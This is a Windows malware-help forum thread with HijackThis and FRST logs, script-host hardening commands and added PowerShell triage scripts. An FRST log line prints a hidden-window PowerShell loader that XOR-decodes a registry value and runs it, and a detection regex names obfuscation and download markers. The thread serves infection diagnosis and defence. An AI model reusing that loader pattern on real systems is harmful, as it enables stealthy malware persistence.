PC Ekspert Forum

PC Ekspert Forum (http://forum.pcekspert.com/index.php)
-   Operating systems (http://forum.pcekspert.com/forumdisplay.php?f=36)
-   -   Windows 10 - problems, troubleshooting (http://forum.pcekspert.com/showthread.php?t=272277)

domy_os 23.07.2023. 21:45

I'd say it's some malware, because that PowerShell task doesn't look legit to me; post a HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

As a precaution, disable script execution: run PowerShell as admin and paste this:

Code:

# Reports whether Windows Script Host is disabled machine-wide: prints True only if the
# 'Enabled' value under HKLM\...\Windows Script Host\Settings exists and is 0; otherwise
# (key or value missing, any other value, or an error) it prints False.
# Get-ItemPropertyValue needs PowerShell 5.0 or newer.
try {
    if (-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")) { return $false }
    if ((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) { } else { return $false }
}
catch { return $false }
return $true

# and finally: stop .ps1 script files from running (machine-wide policy). The leading 'powershell'
# starts a child powershell.exe; in the elevated session Set-ExecutionPolicy on its own does the same.

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted


fre@k 24.07.2023. 01:18

Quote:

Originally posted by domy_os (Post 3687397)
I'd say it's some malware, because that PowerShell task doesn't look legit to me; post a HijackThis log.

https://www.bleepingcomputer.com/download/hijackthis/

As a precaution, disable script execution: run PowerShell as admin and paste this:

Code:

try {
        if(-NOT (Test-Path -LiteralPath "HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings")){ return $false };
        if((Get-ItemPropertyValue -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -ea SilentlyContinue) -eq 0) {  } else { return $false };
}
catch { return $false }
return $true

# and finally

powershell Set-ExecutionPolicy -ExecutionPolicy Restricted


I typed this into PowerShell and it returned false.

Quote:

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 1:16:50, on 24.7.2023.
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.19041.1566)


Boot mode: Normal

Running processes:
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Program Files\Logitech Gaming Software\ArxApplets\Discord\logitechg_discord.exe
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
C:\Program Files (x86)\Skillbrains\lightshot\5.5.0.7\Lightshot.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Users\Boris\Desktop\HijackThis.exe

O17 - HKLM\System\CCS\Services\Tcpip\..\{d7fde4bf-e111-4e9b-a6c9-d207412f0933}: NameServer = 213.191.128.8,213.191.128.9
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Inc. - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Genuine Software Monitor Service (AGMService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service: Adobe Genuine Software Integrity Service (AGSService) - Adobe Systems, Incorporated - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service: eID DCS (AkdEidDcs) - Unknown owner - C:\Program Files\AKD\eID Middleware\Dcs.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: AMD Crash Defender Service - Unknown owner - C:\WINDOWS\System32\amdfendrsr.exe (file missing)
O23 - Service: AMD External Events Utility - AMD - C:\WINDOWS\System32\DriverStore\FileRepository\u0379219.inf_amd64_3649648678001de4\B378972\atiesrxx.exe
O23 - Service: AnyDesk Service (AnyDesk) - AnyDesk Software GmbH - C:\Program Files (x86)\AnyDesk\AnyDesk.exe
O23 - Service: ASUS Com Service (asComSvc) - ASUSTeK Computer Inc. - C:\Program Files (x86)\ASUS\AXSP\4.00.42\atkexComSvc.exe
O23 - Service: @%SystemRoot%\system32\CredentialEnrollmentManager.exe,-100 (CredentialEnrollmentManagerUserSvc) - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: CredentialEnrollmentManagerUserSvc_63b49 - Unknown owner - C:\WINDOWS\system32\CredentialEnrollmentManager.exe (file missing)
O23 - Service: Dropbox Update Service (dbupdate) (dbupdate) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dropbox Update Service (dbupdatem) (dbupdatem) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: DbxSvc - Unknown owner - C:\WINDOWS\system32\DbxSvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: EG Station Information Service - Unknown owner - C:\Esko\bg_prog_egsis_v010\bin_ix86\egsissrv.exe
O23 - Service: Esko Subscription Service - Esko BVBA - C:\Program Files (x86)\Common Files\Esko\SubscriptionService\SubscriptionService\SubscriptionService.exe
O23 - Service: Everything - voidtools - C:\Program Files\Everything\Everything.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FLEXlm License Manager - Flexera - C:\Esko\bg_prog_system_v010\bin_ix86\lmgrd.exe
O23 - Service: FlexNet Licensing Service - Flexera - C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
O23 - Service: FlexNet Licensing Service 64 - Flexera - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Google Chrome Elevation Service (GoogleChromeElevationService) (GoogleChromeElevationService) - Google LLC - C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.199\elevation_service.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Unknown owner - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) PROSet Monitoring Service - Unknown owner - C:\Windows\system32\IProsetMonitor.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Logitech Gaming Registry Service (LogiRegistryService) - Logitech Inc. - C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @oem127.inf,%SERVICE_FRIENDLY_NAME%;Nahimic service (NahimicService) - Unknown owner - C:\WINDOWS\system32\NahimicService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\PerceptionSimulation\PerceptionSimulationService.exe,-101 (perceptionsimulation) - Unknown owner - C:\WINDOWS\system32\PerceptionSimulation\PerceptionSimulationService.exe (file missing)
O23 - Service: Corel License Validation Service V2, Powered by arvato (PSI_SVC_2) - arvato digital services llc - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: Realtek Audio Universal Service (RtkAudioUniversalService) - Unknown owner - C:\WINDOWS\System32\RtkAudUService64.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Samsung UPD Utility Service (SamsungUPDUtilSvc) - Unknown owner - C:\Windows\SysWOW64\SecUPDUtilSvc.exe
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: @%systemroot%\system32\SecurityHealthAgent.dll,-1002 (SecurityHealthService) - Unknown owner - C:\WINDOWS\system32\SecurityHealthService.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe,-1001 (Sense) - Unknown owner - C:\Program Files (x86)\Windows Defender Advanced Threat Protection\MsSense.exe (file missing)
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: @%SystemRoot%\System32\SgrmBroker.exe,-100 (SgrmBroker) - Unknown owner - C:\WINDOWS\system32\SgrmBroker.exe (file missing)
O23 - Service: @firewallapi.dll,-50323 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spectrum.exe,-101 (spectrum) - Unknown owner - C:\WINDOWS\system32\spectrum.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: @oem126.inf,%ss_conn_launcher.SvcDesc%;SAMSUNG Mobile USB Connectivity Launcher (ss_conn_launcher_service) - Unknown owner - C:\WINDOWS\System32\Samsung\EasySetup\ss_conn_launcher.exe (file missing)
O23 - Service: SAMSUNG Mobile Connectivity Service (ss_conn_service) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
O23 - Service: SAMSUNG Mobile Connectivity Service V2 (ss_conn_service2) - DEVGURU Co., LTD. - C:\Program Files\Samsung\USB Drivers\28_ssconn2\conn\ss_conn_service2.exe
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\steamservice.exe
O23 - Service: Adobe SwitchBoard (SwitchBoard) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: VirtualBox system service (VBoxSDS) - Oracle Corporation - C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Wacom Professional Service (WTabletServicePro) - Wacom Co. Ltd. - C:\Program Files\Tablet\Wacom\WTabletServicePro.exe

--
End of file - 10226 bytes

domy_os 25.07.2023. 20:02

Any changes? With this you can disable the script host completely...

Code:

# Creates (or overwrites) the machine-wide 'Enabled' value as DWORD 0; after that wscript.exe and
# cscript.exe refuse to run any script for every user on the PC. Needs an elevated PowerShell.
# -ea SilentlyContinue hides the error you would get if the Settings key itself did not exist.
New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue

I don't see anything suspicious in the HJT log, but post the FRST logs too...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Save it to the desktop, close all applications, run FRST as admin and upload FRST.txt and Addition.txt.
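
The check in the first reply and the disable command above both touch HKLM only and leave the per-user hive alone. As an added example (not code from domy_os's posts), the script below reports the Windows Script Host state for the machine hive and the current-user hive plus the PowerShell execution policy per scope, then disables WSH in both hives through a function that honours -WhatIf. The names Get-WshState and Set-WshEnabled are this example's own. Run it in an elevated PowerShell 5.1 or newer session.

```powershell
# Added example, not code from the forum posts: audit and disable Windows Script Host in both
# hives and show the execution policy per scope. Run elevated (PowerShell 5.1 or newer).
# Get-WshState and Set-WshEnabled are this example's own names.

$WshSettings = @{
    Machine = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'   # applies to all users
    User    = 'HKCU:\SOFTWARE\Microsoft\Windows Script Host\Settings'   # current user only
}

function Get-WshState {
    # One row per hive. A missing key or value means WSH is enabled (the default).
    foreach ($scope in 'Machine', 'User') {
        $path  = $WshSettings[$scope]
        $value = $null
        if (Test-Path -LiteralPath $path) {
            $value = (Get-ItemProperty -LiteralPath $path -Name 'Enabled' -ErrorAction SilentlyContinue).Enabled
        }
        $label = if ($null -eq $value) { '(not set, WSH enabled)' } else { $value }
        [pscustomobject]@{
            Scope   = $scope
            Path    = $path
            Enabled = $label
            Blocked = ($value -eq 0)   # True only when the value exists and is exactly 0
        }
    }
}

function Set-WshEnabled {
    # Writes Enabled = 0 (block) or 1 (allow) into both hives; supports -WhatIf / -Confirm.
    [CmdletBinding(SupportsShouldProcess)]
    param([bool]$Enabled)
    foreach ($path in $WshSettings.Values) {
        if ($PSCmdlet.ShouldProcess($path, "Set Enabled = $([int]$Enabled)")) {
            if (-not (Test-Path -LiteralPath $path)) { New-Item -Path $path -Force | Out-Null }
            New-ItemProperty -LiteralPath $path -Name 'Enabled' -Value ([int]$Enabled) -PropertyType DWord -Force | Out-Null
        }
    }
}

# 1. Where do we stand?
Get-WshState | Format-Table -AutoSize
Get-ExecutionPolicy -List | Format-Table -AutoSize

# 2. Block wscript.exe/cscript.exe for every user (add -WhatIf to preview);
#    Set-WshEnabled -Enabled $true puts it back.
Set-WshEnabled -Enabled $false
Set-ExecutionPolicy -ExecutionPolicy Restricted -Scope LocalMachine -Force
```

One caveat worth knowing before relying on the second command: the execution policy only governs .ps1 script files. It does not apply to code handed to powershell.exe through -Command, -EncodedCommand or standard input, which is exactly how the cmd.exe task in the FRST log further down runs (echo ... | powershell). WSH Enabled = 0, on the other hand, does make wscript.exe refuse the q5wPl.js task in that same log.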

pogi 30.07.2023. 09:12

What do the green check marks on the desktop icons mean?

https://i.ibb.co/vYf7xrR/kvacice-PCE.jpg

xlr 30.07.2023. 09:21

The files/shortcuts are synced with OneDrive (or some other cloud service/NAS: Dropbox, Synology...).

fre@k 05.08.2023. 22:40

Quote:

Originally posted by domy_os (Post 3687787)
Any changes? With this you can disable the script host completely...

Code:

New-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' -Name 'Enabled' -Value 0 -PropertyType DWord -Force -ea SilentlyContinue
I don't see anything suspicious in the HJT log, but post the FRST logs too...

https://www.bleepingcomputer.com/for...ery-scan-tool/

Save it to the desktop, close all applications, run FRST as admin and upload FRST.txt and Addition.txt.


Quote:

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {AA4E7D09-9A75-4EC8-A544-7AE09FE2BF2C} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3571168 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4B2166D7-9095-4E41-8514-761031C41EFF} - System32\Tasks\Adobe-Genuine-Software-Integrity-Scheduler-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3807712 2023-06-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {39C03E5D-2DA3-4F39-B932-843B937F87A9} - System32\Tasks\AMD Updater => "C:\Program Files\AMD\CIM\\Bin64\RadeonInstaller.exe" /AUTOUPDATEIN (No File)
Task: {362C6AB5-4825-4EF1-91A6-1B2EF3E23A1E} - System32\Tasks\AMDInstallLauncher => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {3C99DAB8-74FF-48FD-A420-2D819752AA23} - System32\Tasks\AMDRyzenMasterSDKTask => C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe [329216 2022-04-28] (Advanced Micro Devices, Inc.) [File not signed]
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {B6D087B8-7386-4E55-B3D0-479AE5B8B90B} - System32\Tasks\CorelUpdateHelperTask-3A0684C52AD8F776732C9B1769387381 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {D1A4030E-7946-457D-9793-190B52233518} - System32\Tasks\CorelUpdateHelperTask-CA97E265125F962DF330CDDECA55BEE5 => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {9C9FF58C-A602-46F5-AAE7-A84FA91F0C86} - System32\Tasks\CorelUpdateHelperTaskCore => c:\Program Files (x86)\Corel\CUH\v2\CUH.exe [3799264 2021-08-26] (Corel Corporation -> Corel Corporation)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {37CA0682-E6DF-49F6-8163-0FA4D5DC50D2} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {C3330DB9-49FB-4267-89AC-052150FEDDF0} - System32\Tasks\eID Updater => C:\Program Files\AKD\eID Middleware\Updater.exe [1180352 2022-09-09] (AKD d.o.o. -> Agencija za komercijalnu djelatnost)
Task: {05394564-3C71-4D68-9648-25FF67BB7DF3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {589D9887-524D-4F64-A8D4-284AF9A1EE9E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-01] (Google Inc -> Google Inc.)
Task: {AF9D7CB3-4F89-4566-BC65-5AA0F26EBBDA} - System32\Tasks\GPU Tweak III => C:\Program Files (x86)\ASUS\GPUTweakIII\GPU Tweak III.exe (No File)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
Task: {BB849378-0BD7-4B2F-95F5-770D9CDF04AC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D5027B44-EABC-4281-A4B1-4AE77EB51887} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {34C46FA8-19E5-4D6A-A5E0-987A63C380DD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {13FD3601-86C6-4450-A538-023F355286CA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.9-0\MpCmdRun.exe [1649976 2023-07-31] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7899D856-F71C-4C55-A4C4-56EF43747554} - System32\Tasks\ModifyLinkUpdate => C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe [1147440 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {6DE6F7EF-B1C1-4557-8AF0-0F38DB348395} - System32\Tasks\NahimicSvc32Run => C:\Windows\SysWOW64\NahimicSvc32.exe [833688 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {C6CC0EEB-5664-4B80-B25B-C44066678B6A} - System32\Tasks\NahimicSvc64Run => C:\Windows\System32\NahimicSvc64.exe [1094808 2021-11-01] (A-Volute SAS -> Nahimic)
Task: {048CC466-9E92-4167-B46A-3AE942372F8A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [5339512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {5763BDB9-76F7-4E06-A9A5-DF31824F83EB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5659512 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DC6568DB-8280-4900-A49A-A3C5C22FB845} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [5839224 2023-02-14] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {99A4D46B-6BA9-48BD-8FB2-327DC62F789C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [56368 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {0FAD7383-8483-46BA-B554-AAE7B51C68B4} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [261680 2022-04-28] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.)
Task: {11B7C842-A90B-41BB-AD4E-5835311B3248} - System32\Tasks\update-S-1-5-21-1851460496-1243864188-3666012494-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: )
Task: {2CD04026-E5A8-41BD-B48E-08B3B9470A72} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: )
So I googled all of them, but I don't know what this one is connected to:

Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
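
The two task lines the poster could not place are exactly the kind of entries a triage script should pick out on its own. Below is an added example, not FRST's code or anything posted in the thread: it parses FRST "Task:" lines and flags an entry when its action is a script host or shell (wscript, cscript, cmd, powershell, mshta, ...), when its arguments carry obfuscation markers (iex, -bxor, a hidden window, an encoded command, a .js/.vbs/.hta path), or when FRST marked the target as missing, unsigned or "ATTENTION"; a second function applies the same heuristics to the live task store with Get-ScheduledTask. The sample input is five lines copied from the FRST output above, two malicious and three benign; the function names, the interpreter list and the marker regex are this example's own.

```powershell
# Added example, not FRST's code or anything from the thread: triage FRST "Task:" lines.
# Names, lists and sample lines are this example's own choices (lines copied from the log above).

# Interpreters and proxy binaries that malware likes to launch from a scheduled task
$Interpreters = 'wscript','cscript','cmd','powershell','pwsh','mshta','rundll32','regsvr32','msiexec','certutil','bitsadmin'
# Argument markers: in-memory execution, XOR decoding, hidden window, encoded command, script files
$ArgumentMarkers = 'iex|invoke-expression|-bxor|windowstyle\s+hidden|-enc|downloadstring|frombase64string|\.js(\s|$)|\.vbs(\s|$)|\.hta(\s|$)'

function Find-SuspiciousFrstTask {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        # Task: {GUID} - System32\Tasks\<name> => <exe> [<size> <date>] (<signer>) [-> <arguments>]
        if ($line -match '^Task: \{[0-9A-F-]+\} - System32\\Tasks\\(?<name>.+?) => (?<rest>.+)$') {
            $name = $Matches.name
            $rest = $Matches.rest
            $exe  = if ($rest -match '^"?(?<exe>.+?\.exe)') { $Matches.exe } else { '' }
            $base = (($exe -split '[\\/]')[-1] -replace '\.exe$', '').ToLowerInvariant()
            # Arguments follow "(signer) -> "; the signer text itself contains "->", hence the ")"
            $arguments = if ($rest -match '\) -> (?<a>.+)$') { $Matches.a } else { '' }

            $reasons = @()
            if ($Interpreters -contains $base)       { $reasons += "launches $base" }
            if ($arguments -match $ArgumentMarkers)   { $reasons += 'script/obfuscation markers in arguments' }
            if ($rest -match '\(No File\)|\[File not signed\]|ATTENTION') { $reasons += 'target missing, unsigned or flagged by FRST' }
            if ($reasons.Count -gt 0 -and $name -like 'Microsoft\Windows\*') { $reasons += 'hides under the Microsoft task folder' }

            if ($reasons.Count -gt 0) {
                [pscustomobject]@{ Task = $name; Exe = $exe; Reasons = ($reasons -join '; ') }
            }
        }
    }
}

function Find-SuspiciousScheduledTask {
    # Same heuristics against the live task store (Windows, elevated). Expect some noise from
    # legitimate Microsoft tasks that run rundll32/powershell; compare paths and signatures by hand.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $exe       = [string]$action.Execute
            $base      = (($exe.Trim('"') -split '[\\/]')[-1] -replace '\.exe$', '').ToLowerInvariant()
            $arguments = [string]$action.Arguments
            if ($Interpreters -contains $base -or $arguments -match $ArgumentMarkers) {
                [pscustomobject]@{ Task = $task.TaskPath + $task.TaskName; Exe = $exe; Arguments = $arguments }
            }
        }
    }
}

# Sample input: five lines copied from the FRST output posted above (two malicious, three benign)
$sample = @'
Task: {AEAD4086-B489-47CE-B6C2-2959F4C3307D} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe (No File)
Task: {60FB7528-96B7-4FA1-B245-6B63B40A5F47} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [130320 2021-11-12] (Dropbox, Inc -> Dropbox, Inc.)
Task: {AE1B71B5-723A-4C61-9176-E0447C7D16C6} - System32\Tasks\Microsoft\Windows\Live\025Mp7ajtIGb => C:\WINDOWS\system32\wscript.exe [170496 2021-09-14] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\System32\q5wPl.js /b <==== ATTENTION
Task: {72B09958-4276-4FB8-902F-C0A5D97622C7} - System32\Tasks\Microsoft\Windows\Management\Provisioning\JHTFCtmf\E9C9F0D0-30A9-4942-B4FF-B5648160F764 => C:\WINDOWS\system32\cmd.exe [289792 2021-01-13] (Microsoft Windows -> Microsoft Corporation) -> /c echO iEx "iCm ([sCRipTblock]::cREATE([StrING]::JOin('', ((get-iteMPropeRty -pATh 'hKlm:\SofTware\MinnetOnKA auDio SofTwareJhTfCtMFr').'jHTFctMfrmH' | % { [ChAr](`$_ -Bxor 201) }))))" | POWERsHELl -wINDoWSTyLE HiDdEN
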